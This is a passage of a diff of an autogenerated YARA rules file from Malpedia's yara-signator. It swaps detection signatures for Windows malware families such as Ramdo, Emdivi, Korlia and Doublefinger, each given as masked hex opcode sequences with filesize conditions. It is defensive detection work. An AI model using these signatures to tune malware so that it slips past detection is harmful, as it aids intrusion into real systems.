-		$sequence_5 = { 8d4d9c e8???????? 68???????? ff750c 68???????? ff7508 68???????? }
-		$sequence_6 = { e8???????? 8b4c241c 8b11 52 e8???????? 8bf0 83c410 }
-		$sequence_7 = { e8???????? 59 59 8365fc00 ff7514 8d459c 50 }
-		$sequence_8 = { c3 5b 5f 5e b801000000 5d 83c408 }
-		$sequence_9 = { 8bf0 85f6 7511 6829010000 68???????? 6a41 e9???????? }
+		$sequence_0 = { 8b07 8b4804 8d41e0 894439fc c745fc07000000 }
+		$sequence_1 = { 6a00 83c804 50 e8???????? 8b55e0 8b7de8 }
+		$sequence_2 = { 83c404 e8???????? 99 b95b000000 f7f9 }
+		$sequence_3 = { 8b7c2424 89542428 8b54240c 83d200 }
+		$sequence_4 = { 83c318 897730 83c404 895f38 }
+		$sequence_5 = { 8b75a8 46 56 e8???????? }
+		$sequence_6 = { 50 ff15???????? 83f805 7507 }
+		$sequence_7 = { 56 ff15???????? ff15???????? 50 6a00 68ffff1f00 }
+		$sequence_8 = { f7f9 81c2d0070000 52 ffd6 }
+		$sequence_9 = { 83c223 2bc1 83c0fc 83f81f 0f877e030000 }
+		$sequence_10 = { 8b07 6a08 895de0 8b4004 }
+		$sequence_11 = { 8b8550fdffff 83e001 0f8412000000 83a550fdfffffe }
+		$sequence_12 = { 83c404 8d4718 897034 8d5804 }
+		$sequence_13 = { 8d442410 50 ff15???????? 6685c0 }
+		$sequence_14 = { 8945e0 c7437000000000 c7839000000000000000 c7839400000000000000 }
+		$sequence_15 = { 8bc8 83ec1c c645fc3c 8d8500ffffff }
 
 	condition:
-		7 of them and filesize < 7086080
+		7 of them and filesize < 4716352
 }
-rule MALPEDIA_Win_Ntospy_Auto : FILE
+rule MALPEDIA_Win_Ramdo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b4a63087-adf5-553a-badd-9c3b2b74fa54"
+		id = "08b789f2-d7a2-5fbb-860d-c8f55dcc2345"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ntospy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ntospy_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ramdo_auto.yar#L1-L107"
 		license_url = "N/A"
-		logic_hash = "cce1d343f3ff134391791227274b4a5b285b13f3052430b7eb6796387898d86b"
+		logic_hash = "276f369c53a1fdcd50e18eb96f6dc8769ce2d1ebf68a37e2dea30ad2afbcd8fa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112880,32 +112957,32 @@ rule MALPEDIA_Win_Ntospy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c705????????01000000 c705????????01000000 b808000000 486bc000 488d0d0ead0000 8b542430 48891401 }
-		$sequence_1 = { 837a2400 7d04 32c0 eb14 b001 eb10 }
-		$sequence_2 = { 488d0585520100 c3 8325????????00 c3 48895c2408 55 488dac2440fbffff }
-		$sequence_3 = { 4c8bda 488d356780ffff 4183e30f 488bfa 492bfb }
-		$sequence_4 = { 498784f620600100 eb1e 488bc3 498784f620600100 4885c0 }
-		$sequence_5 = { b91c000000 4c8d0560770000 488d155d770000 e8???????? 4885c0 7416 }
-		$sequence_6 = { 740f 833c240c 7410 eb15 }
-		$sequence_7 = { 488b4c2448 ff15???????? 48c744242000000000 4c8d4c2440 41b804000000 }
-		$sequence_8 = { 4883ec28 488b442440 4883c028 488b4c2440 4883c118 }
-		$sequence_9 = { 4c8d2dcaf80000 448bf3 498bc5 8d6b01 3938 }
+		$sequence_0 = { ff55f8 8945fc 837dfcff 7411 }
+		$sequence_1 = { 6813299e13 6a00 6a00 e8???????? }
+		$sequence_2 = { 55 8bec 83ec0c 68b928ece1 }
+		$sequence_3 = { 83c414 68b6b2cff5 6a03 6a00 e8???????? }
+		$sequence_4 = { 68bc882a42 6a03 6a00 e8???????? }
+		$sequence_5 = { 55 8bec 83ec0c 68b928ece1 6a03 6a00 }
+		$sequence_6 = { 68ce173dab 6a03 6a00 e8???????? }
+		$sequence_7 = { 68b796c807 6a03 6a00 e8???????? }
+		$sequence_8 = { 68b900308a 6a01 6a00 e8???????? }
+		$sequence_9 = { 689aa93f35 6a05 6a00 e8???????? }
 
 	condition:
-		7 of them and filesize < 208896
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Bundestrojaner_Auto : FILE
+rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "22b55f6b-e040-5c18-ad23-824cbb63f192"
+		id = "315509a3-d1f8-5dc1-9f12-edd6db041fca"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bundestrojaner_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orpcbackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.orpcbackdoor_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "4726f6c288ba39b565a7c1ba35f099303564bb770df1743f44ad4cd587b35c16"
+		logic_hash = "89d46489afd17625d89dcf271ed3d1e11fa0fe1e28ec9d95da8becb11eb31f60"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112919,32 +112996,32 @@ rule MALPEDIA_Win_Bundestrojaner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bf0 85f6 75d3 57 ff15???????? }
-		$sequence_1 = { 84c9 0f8486010000 84c0 0f84e6000000 8b4e24 8b11 ff5204 }
-		$sequence_2 = { 7d02 8bc2 8b542414 03ca 8b5620 3bca 7e0e }
-		$sequence_3 = { 8d149d00000000 2bc3 7914 8bc1 2bc2 8b5cbc44 8b0428 }
-		$sequence_4 = { 0210 3f 2102 1008 2102 105121 0210 }
-		$sequence_5 = { 8b5614 895118 8b06 ff10 83c404 8b442414 33db }
-		$sequence_6 = { 03c8 8b4614 3bc5 894c242c 0f8e21020000 8b442420 8b4e3c }
-		$sequence_7 = { d9442454 d81d???????? d9442454 dfe0 f6c441 7406 dc0d???????? }
-		$sequence_8 = { 8b4c2418 52 8b542424 53 52 8b542420 50 }
-		$sequence_9 = { 8b56f8 33c3 8b1c8d187b0410 33c3 33c9 33c2 33d2 }
+		$sequence_0 = { ff503c 89859cfdffff 83bd9cfdffff00 7d48 8b85d4fdffff 8b00 ffb5d4fdffff }
+		$sequence_1 = { ff15???????? 8985b0feffff 8d85bcfeffff 50 ffb5b8feffff e8???????? 85c0 }
+		$sequence_2 = { f20f59148590dc0310 660f5834c5a0e40310 660f54c5 f20f5ce8 f20f58fa f20f10d8 f20f59c1 }
+		$sequence_3 = { 8b55fc 89440ae4 c9 c3 55 8bec 83ec0c }
+		$sequence_4 = { 8d85dcf7ffff 50 8d8d20ebffff e8???????? 8d8da7e6ffff e8???????? 50 }
+		$sequence_5 = { 83b8a800000000 750e 8b04bd20cc0610 807c182900 741d 8d45fc 50 }
+		$sequence_6 = { c3 85c0 78f5 8b1cc554a30310 6a55 53 e8???????? }
+		$sequence_7 = { 8b4508 8945f4 c645f801 8b45f0 83c004 50 }
+		$sequence_8 = { 8b45fc 83c004 50 e8???????? 59 c9 c3 }
+		$sequence_9 = { e8???????? 59 8b45fc 8b4010 40 50 ff75f8 }
 
 	condition:
-		7 of them and filesize < 729088
+		7 of them and filesize < 918528
 }
-rule MALPEDIA_Win_Microbackdoor_Auto : FILE
+rule MALPEDIA_Win_Dnespy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ca439651-8945-55d7-8b43-498ad02227fd"
+		id = "dd2f9ed7-2d6f-5933-9493-a41c942bf03f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.microbackdoor_auto.yar#L1-L179"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dnespy_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "a9f80afe51613a501aee1e06cfe93241c41ac6752fa256f5ea6aad4ef6ad5201"
+		logic_hash = "eee42a6a521e66ad81f34fb24c5fab011a7b4af2844dffcdf7998746a9a87ff5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112958,38 +113035,32 @@ rule MALPEDIA_Win_Microbackdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 6a00 68e9fd0000 ff15???????? 33c0 50 50 }
-		$sequence_1 = { 4863c8 4803d9 443823 75b3 418bf5 e9???????? 418bc7 }
-		$sequence_2 = { 448d6f01 b940000000 418bd5 ff15???????? 488bd8 4885c0 0f8441010000 }
-		$sequence_3 = { 8d4801 83f901 7620 03d8 3bdf 7cda b801000000 }
-		$sequence_4 = { 0f849a000000 48899c24b0040000 4889bc2488040000 4c89bc2480040000 e8???????? 8bf8 e8???????? }
-		$sequence_5 = { 59 59 85c0 74eb 56 }
-		$sequence_6 = { ff15???????? 85c0 7507 ffd7 e9???????? 8d8570feffff 50 }
-		$sequence_7 = { e8???????? 59 8bc8 81e1ffffff7f 83f902 741e }
-		$sequence_8 = { eb25 488bcb 458be7 418bf5 }
-		$sequence_9 = { 410fb7f0 448bf2 488bd9 e8???????? }
-		$sequence_10 = { 7507 33c0 66894473fe 8d4bfe 33d2 668b4102 8d4902 }
-		$sequence_11 = { 8b45f0 8945e0 8d45dc 6a08 }
-		$sequence_12 = { a3???????? 85c0 740d ffd7 3db7000000 0f8446010000 56 }
-		$sequence_13 = { 8b45fc 6a01 59 0f44c1 5f 5e 5b }
-		$sequence_14 = { 4885d2 7410 46380c01 7502 ffc0 }
-		$sequence_15 = { ebe0 ff15???????? 488d0de93e0000 8bd0 e8???????? ebc8 }
+		$sequence_0 = { 83c410 3bc1 7412 8bc3 83ceff 2bc1 03f8 }
+		$sequence_1 = { 8d4d88 e8???????? 83e7fd 83cf01 c745fc06000000 8b45b0 }
+		$sequence_2 = { 83c408 8b951cfeffff c78584feffff00000000 c78588feffff0f000000 c68574feffff00 83fa10 }
+		$sequence_3 = { 51 e8???????? 83c408 83c8ff 5f 5e 5b }
+		$sequence_4 = { 040d 3474 888575ffffff 8b8564ffffff 040e 3420 }
+		$sequence_5 = { 83eb01 75eb 836c241401 0f85b0feffff 8bf7 8d5a04 8bce }
+		$sequence_6 = { c68521f7ffff7e c68522f7ffff6f c68523f7ffff78 c68524f7ffff7e c68525f7ffff37 c68526f7ffff5e c68527f7ffff83 }
+		$sequence_7 = { 346c 8885e2f7ffff 8b8578f7ffff 0467 3461 8885e3f7ffff 8b8578f7ffff }
+		$sequence_8 = { ff15???????? 83c408 85c0 7553 8b451c 8b5e0c 894640 }
+		$sequence_9 = { e8???????? c645fc01 8b55b4 8bc2 8b4db0 2bc1 83f801 }
 
 	condition:
-		7 of them and filesize < 123904
+		7 of them and filesize < 794624
 }
-rule MALPEDIA_Win_Wannacryptor_Auto : FILE
+rule MALPEDIA_Win_Crutch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "64c0c24a-16a6-55da-a692-97069f01b9dc"
+		id = "36959a18-dba5-5b13-9b8a-5318a7ab018e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wannacryptor_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crutch_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "afdf6a6730d9f47a6baac4eceac9faa53fb74580c5a732dc9532925b43ed27e8"
+		logic_hash = "6e39432bedc9454e05a5557719c4ba13f7f6afdacb986523a0105dea7f4efdfa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113003,32 +113074,32 @@ rule MALPEDIA_Win_Wannacryptor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f802 757f 8b5674 8d7e44 8d442414 52 }
-		$sequence_1 = { 23c3 8b5c2468 53 8b5c2468 53 }
-		$sequence_2 = { 8b16 c1f805 0faff8 897e04 8b4160 03c2 }
-		$sequence_3 = { 8d542418 c744243005000000 8b41f8 8b4e74 2bc1 }
-		$sequence_4 = { 51 885c243c e8???????? 50 8bcf c644243404 }
-		$sequence_5 = { 8d4c241c 6a01 51 8a02 8bcf 88442418 }
-		$sequence_6 = { 7e76 8bd8 8b5500 03cf 8a0417 50 }
-		$sequence_7 = { 8d442420 f7d8 1bc0 682000cc00 23c3 8b5c2468 53 }
-		$sequence_8 = { 0f8c42ffffff 8b442438 5f 85c0 7403 }
-		$sequence_9 = { 8a1401 8d4c2460 8854243c 8b44243c }
+		$sequence_0 = { 3944240c 0f8523060000 837e5800 0f84cb000000 8d442418 50 8d4c2408 }
+		$sequence_1 = { 85c0 0f85bc000000 8b4c2458 6a00 6a00 8d86604b0000 50 }
+		$sequence_2 = { c60730 4f 4e 85d2 7e0f 2bf2 }
+		$sequence_3 = { 8944241c 8944242c 83f901 7507 b9???????? eb0f 83f902 }
+		$sequence_4 = { 07 08cc 8b442404 56 8bb088050000 85f6 7438 }
+		$sequence_5 = { 8b742424 8b9660060000 83ec10 8bcc 8911 8b9664060000 895104 }
+		$sequence_6 = { 899ee8020000 e8???????? 8bf8 5f 33db 5b }
+		$sequence_7 = { 0f85ab000000 837dec00 0f84a1000000 8b55f4 8b049588980710 f644180448 7452 }
+		$sequence_8 = { 8db0f04b0000 8937 e8???????? 8906 c7460400000000 85db 743b }
+		$sequence_9 = { 5d c3 6a6c b8???????? e8???????? 8bf9 83ec18 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 1067008
 }
-rule MALPEDIA_Win_Sasfis_Auto : FILE
+rule MALPEDIA_Win_Emdivi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c173d20c-b6af-5642-9dac-436a162fb4a4"
+		id = "04ac374c-dabe-58e4-92b7-b141ee96d84c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sasfis_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.emdivi_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "7c5f9810c1f84570570dc00d72da471119d3938e3544c5969df4af5e973862b8"
+		logic_hash = "17250ab484761cd3c4abb0e5e481a1578bae8e41059cc5bbab60b36acc5f6199"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113042,34 +113113,34 @@ rule MALPEDIA_Win_Sasfis_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 9c 8a4d02 9c 83ed02 }
-		$sequence_1 = { 9c ff3424 9c 9c 8f442440 66c70424ae36 ff742440 }
-		$sequence_2 = { 016e05 036e20 43 7465 47 d220 04b7 }
-		$sequence_3 = { 0fc1fd 8d6c2424 ff742408 80fd7b 81cf73a6238d 81ec98000000 }
-		$sequence_4 = { 8d881c2d4e65 660fbecb 57 660fc9 0f92c5 0fb6c9 53 }
-		$sequence_5 = { 66ffc1 f6d0 660fbec9 8a46ff 9c 66ffc9 }
-		$sequence_6 = { 9c 66ffc9 8a2c24 0fb6c0 }
-		$sequence_7 = { 660fbec2 660fb6c0 8b4500 e8???????? 661584f0 fec0 27 }
-		$sequence_8 = { 6c 785f 007d3f cf }
-		$sequence_9 = { 3d0d351d11 0531250968 b3af 7c00 e8???????? }
+		$sequence_0 = { c1e304 83e203 3355f8 33fb }
+		$sequence_1 = { 53 50 889decfaffff e8???????? 83c40c 56 }
+		$sequence_2 = { 53 56 57 8bf8 83ff01 0f8ec5000000 }
+		$sequence_3 = { 50 e8???????? 83c40c 56 8d85b4fdffff 53 50 }
+		$sequence_4 = { 8945e4 e8???????? 8bd8 8bc6 59 c6432000 }
+		$sequence_5 = { 0f849b000000 8b4d08 83c604 ff45f8 85c9 7409 394df8 }
+		$sequence_6 = { 8975ec 8b03 8945f0 8b4304 8945f4 }
+		$sequence_7 = { 03fb 33fa 2939 8b31 054786c861 8945fc 0f856effffff }
+		$sequence_8 = { a1???????? 33c5 8945fc 8365d000 803e00 }
+		$sequence_9 = { ff75b8 8d45bc 6a40 6a01 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 8060928
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Flawedgrace_Auto : FILE
+rule MALPEDIA_Win_Korlia_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7a2b679-4a09-5cd6-8d45-af761287421f"
+		id = "f4183d87-ea91-5bb4-a600-f9953387c71f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flawedgrace_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.korlia_auto.yar#L1-L479"
 		license_url = "N/A"
-		logic_hash = "1ff4be291ff6b1a953ca9c7eac4587b5db7acf2526c0381d7b2b4e64ad42f78b"
+		logic_hash = "05ee31919c5d4bc6056f376629b9d7ad98c63e5082d49653926cef5a9130bcaf"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113081,32 +113152,74 @@ rule MALPEDIA_Win_Flawedgrace_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c685a4cdffff2c c685a5cdffff00 c685a6cdffff00 c685a7cdffff48 c685a8cdffffff c685a9cdffffce c685aacdffff0f }
-		$sequence_1 = { 83e03f 6bd030 895de4 8b049db8d34600 8945d4 8955e8 8a5c1029 }
-		$sequence_2 = { 56 57 8bf9 c745f800000000 8bf2 8975fc 85ff }
-		$sequence_3 = { c685dbc3ffff00 c685dcc3ffff00 c685ddc3ffff00 c685dec3ffff00 c685dfc3ffff00 c685e0c3ffff00 c685e1c3ffff00 }
-		$sequence_4 = { c6858ad9ffff00 c6858bd9ffff00 c6858cd9ffff00 c6858dd9ffff00 c6858ed9ffff00 c6858fd9ffff00 c68590d9ffff00 }
-		$sequence_5 = { c7410800000000 c74110ffffffff c74114ffffffff c7411c0c000000 c701???????? c741380f000000 c7413400000000 }
-		$sequence_6 = { 75f9 2bf1 b001 5f 8933 5e 5b }
-		$sequence_7 = { c68580d2ffff10 c68581d2ffff48 c68582d2ffff83 c68583d2ffffec c68584d2ffff20 c68585d2ffff4c }
-		$sequence_8 = { c744241800000000 50 ff7508 0f57c0 c744243400000000 8bf1 0f11442424 }
-		$sequence_9 = { 0f84f8000000 8d442450 50 68???????? 8d842460010000 6804010000 50 }
+		$sequence_0 = { 81fb68584d56 0f9445e4 5b 59 5a c745fcffffffff 8a45e4 }
+		$sequence_1 = { c1fa0e 8bc2 c1e81f 03d0 52 68???????? 51 }
+		$sequence_2 = { 68???????? 51 ffd6 8bc7 b980ee3600 99 }
+		$sequence_3 = { 8bc7 b9005c2605 99 f7f9 }
+		$sequence_4 = { ff15???????? 8bf8 b83bd4b531 f7ef }
+		$sequence_5 = { 68???????? 68???????? ffd6 b905000000 be???????? }
+		$sequence_6 = { c3 85db 7410 6a28 68???????? 6aff }
+		$sequence_7 = { 83ec0c 53 56 57 8965e8 c645e401 c745fc00000000 }
+		$sequence_8 = { 6a01 53 53 53 51 ff15???????? 85c0 }
+		$sequence_9 = { 8b442404 56 6a00 6a00 6a01 6a00 6a00 }
+		$sequence_10 = { 6a01 6a00 6a00 6800000040 50 ff15???????? 8bf0 }
+		$sequence_11 = { 8bf0 83feff 7423 8b542410 8b44240c 8d4c2408 6a00 }
+		$sequence_12 = { e8???????? 8a4c2404 6a01 884814 }
+		$sequence_13 = { 59 59 c3 8b65e8 ff7588 ff15???????? 833d????????ff }
+		$sequence_14 = { 898840200000 58 c20800 e9???????? 6800060000 6a00 e8???????? }
+		$sequence_15 = { ff7588 ff15???????? 833d????????ff 750c ff742404 ff15???????? 59 }
+		$sequence_16 = { 50 56 ff15???????? 56 ff15???????? b001 }
+		$sequence_17 = { ff742410 ff742410 ff742410 e8???????? c21000 e8???????? 8a4c2404 }
+		$sequence_18 = { 8bf9 81e7ff000000 03f2 03f7 }
+		$sequence_19 = { 8d442444 894d00 8b542438 83c504 }
+		$sequence_20 = { 680030c800 6a00 6a00 68???????? }
+		$sequence_21 = { 8b542438 83c504 50 895500 }
+		$sequence_22 = { b8447c0000 e8???????? 53 56 }
+		$sequence_23 = { 6a00 6880000000 6800000400 8bce }
+		$sequence_24 = { 6a00 6a00 6a00 50 8bce e8???????? 6a00 }
+		$sequence_25 = { 51 ff15???????? a1???????? b981000000 }
+		$sequence_26 = { 85c0 750c ff15???????? 53 e9???????? }
+		$sequence_27 = { ffd6 8d44240c 6804010000 50 }
+		$sequence_28 = { 50 ffd6 eb06 8b35???????? a1???????? }
+		$sequence_29 = { 68ff0f1f00 ff15???????? 85c0 740a }
+		$sequence_30 = { e8???????? 6a00 6a00 8d542414 6a00 52 }
+		$sequence_31 = { 7403 50 ffd6 b912010000 33c0 }
+		$sequence_32 = { 8d4c2410 6804010000 51 aa ff15???????? bf???????? 83c9ff }
+		$sequence_33 = { 6a00 68???????? 6801000080 ff15???????? 85c0 0f8599000000 }
+		$sequence_34 = { 8d442400 50 6806000200 6a00 }
+		$sequence_35 = { 85c0 740a 56 50 ff15???????? 8bf0 }
+		$sequence_36 = { 8b4c2410 50 6a01 6a00 68???????? 51 }
+		$sequence_37 = { 3bc3 57 740b 8b35???????? 50 }
+		$sequence_38 = { 8b35???????? a1???????? 3bc3 7403 50 }
+		$sequence_39 = { 8d7c2411 88442410 f3ab 66ab 8d4c2410 6804010000 }
+		$sequence_40 = { 33c0 8dbc245e020000 66899c245c020000 f3ab }
+		$sequence_41 = { 68003e0000 f2ae f7d1 2bf9 68???????? }
+		$sequence_42 = { e8???????? 83c414 8d8424e0050000 50 }
+		$sequence_43 = { 8d85f4edffff 6a08 ffb5f0edffff 50 e8???????? }
+		$sequence_44 = { 56 57 b97c000000 33c0 8dbdd1fbffff c685d0fbffff00 8965f0 }
+		$sequence_45 = { 55 8b2d???????? 56 57 33db b90c000000 33c0 }
+		$sequence_46 = { 68???????? 52 c745cc0c714000 e8???????? 8d45c8 8d8dc4fdffff 50 }
+		$sequence_47 = { e9???????? e8???????? 99 b970170000 f7f9 81c2983a0000 }
+		$sequence_48 = { 8db5d4f2ffff 8dbdc8f0ffff 6a00 f3a5 50 }
+		$sequence_49 = { 899c2458040000 e8???????? 8d8c24582c0000 50 51 e8???????? }
+		$sequence_50 = { 8d4dfc 0345fc 51 8b4df4 51 }
+		$sequence_51 = { 8d4510 6a04 50 8b4608 6a1f 53 ffd0 }
 
 	condition:
-		7 of them and filesize < 966656
+		7 of them and filesize < 263168
 }
-rule MALPEDIA_Win_Broomstick_Auto : FILE
+rule MALPEDIA_Win_Datper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ac676bf4-a9fb-5087-a5ff-f584bac2c26e"
+		id = "48b52ade-f95f-5b7e-bf6c-1ada03264771"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broomstick"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.broomstick_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.datper_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "f03767b95c94bb52a9880746cdaa45b8005de1fc3a428f79c36aad1a9accc086"
+		logic_hash = "34ec1eabfa283c917df6f57bb7cf677574c84996d2deb9b676fabcef09eea21f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113120,32 +113233,32 @@ rule MALPEDIA_Win_Broomstick_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7471400000000 8b5610 8b4b10 8955f0 894dec 8d0411 8945f8 }
-		$sequence_1 = { 8b5dd8 ff00 33f6 8b00 0fb608 }
-		$sequence_2 = { e9???????? c3 8d8d00ffffff e9???????? 8d8d78ffffff }
-		$sequence_3 = { 8bce ff15???????? 8bcf ffd6 8b8528ffffff }
-		$sequence_4 = { eb1a 56 53 57 e8???????? 668b4510 }
-		$sequence_5 = { b8???????? e9???????? 8d8dfcfeffff e9???????? 8d8dfcfeffff e9???????? }
-		$sequence_6 = { 3bf7 7cdb 5f 5e 5b }
-		$sequence_7 = { 50 e8???????? 8d4d90 e8???????? e9???????? 8b07 }
-		$sequence_8 = { e9???????? 8b8510ffffff 8b00 8b7018 8d45a8 }
-		$sequence_9 = { 85c0 7425 8d3c40 03ff 83ef06 8bd3 }
+		$sequence_0 = { 8b45a0 50 8b45a8 50 e8???????? }
+		$sequence_1 = { 56 53 e8???????? a3???????? 8d95d8fbffff b8???????? e8???????? }
+		$sequence_2 = { 8b4514 50 68???????? 53 }
+		$sequence_3 = { e8???????? 8bf8 8b8574d7ffff a3???????? 68e8030000 e8???????? 8d45e4 }
+		$sequence_4 = { d1e8 8bf0 8d45e8 50 8bce 8bd3 }
+		$sequence_5 = { ba???????? 8b45fc e8???????? 8b95ecf9ffff b8???????? e8???????? 8d85e8f9ffff }
+		$sequence_6 = { 55 68???????? 64ff30 648920 8d8578ffffff 50 e8???????? }
+		$sequence_7 = { 75cd 8b45f8 5f 5e 5b }
+		$sequence_8 = { 83c604 4b 75ed bb02000000 8bf7 83c8ff e8???????? }
+		$sequence_9 = { 8bd6 8bc6 e8???????? 33ff c745f400004000 }
 
 	condition:
-		7 of them and filesize < 1016832
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Graftor_Auto : FILE
+rule MALPEDIA_Win_Doublefinger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c144e9e9-346f-5b6a-9dfe-1d03b0e82296"
+		id = "cf642cb4-badb-524a-b631-15e39cc2daf5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graftor_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doublefinger_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "fb4376621aa16704d8aafacb83eec317def5e2f740ec5d73dd897b4e00fd49ae"
+		logic_hash = "3eae491d263429c9200953e488faaa30692919588c48a865c32492ea2fca792f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113159,32 +113272,32 @@ rule MALPEDIA_Win_Graftor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c684246003000090 e8???????? 8d8c24e8010000 51 8d4c2440 51 8d9424c4000000 }
-		$sequence_1 = { 81fee8d94e00 59 7cee 5e c3 8bff 55 }
-		$sequence_2 = { 6a30 ff750c 6a00 ff7508 ffd0 5d }
-		$sequence_3 = { a5 a5 a5 7205 8b4004 eb03 83c004 }
-		$sequence_4 = { ff15???????? 57 85c0 750c ff15???????? 32c0 5f }
-		$sequence_5 = { 732c ff75f0 8b4508 8b00 ff75ec 8945e4 8d45e4 }
-		$sequence_6 = { 57 50 51 57 68e9fd0000 ffd3 8945c8 }
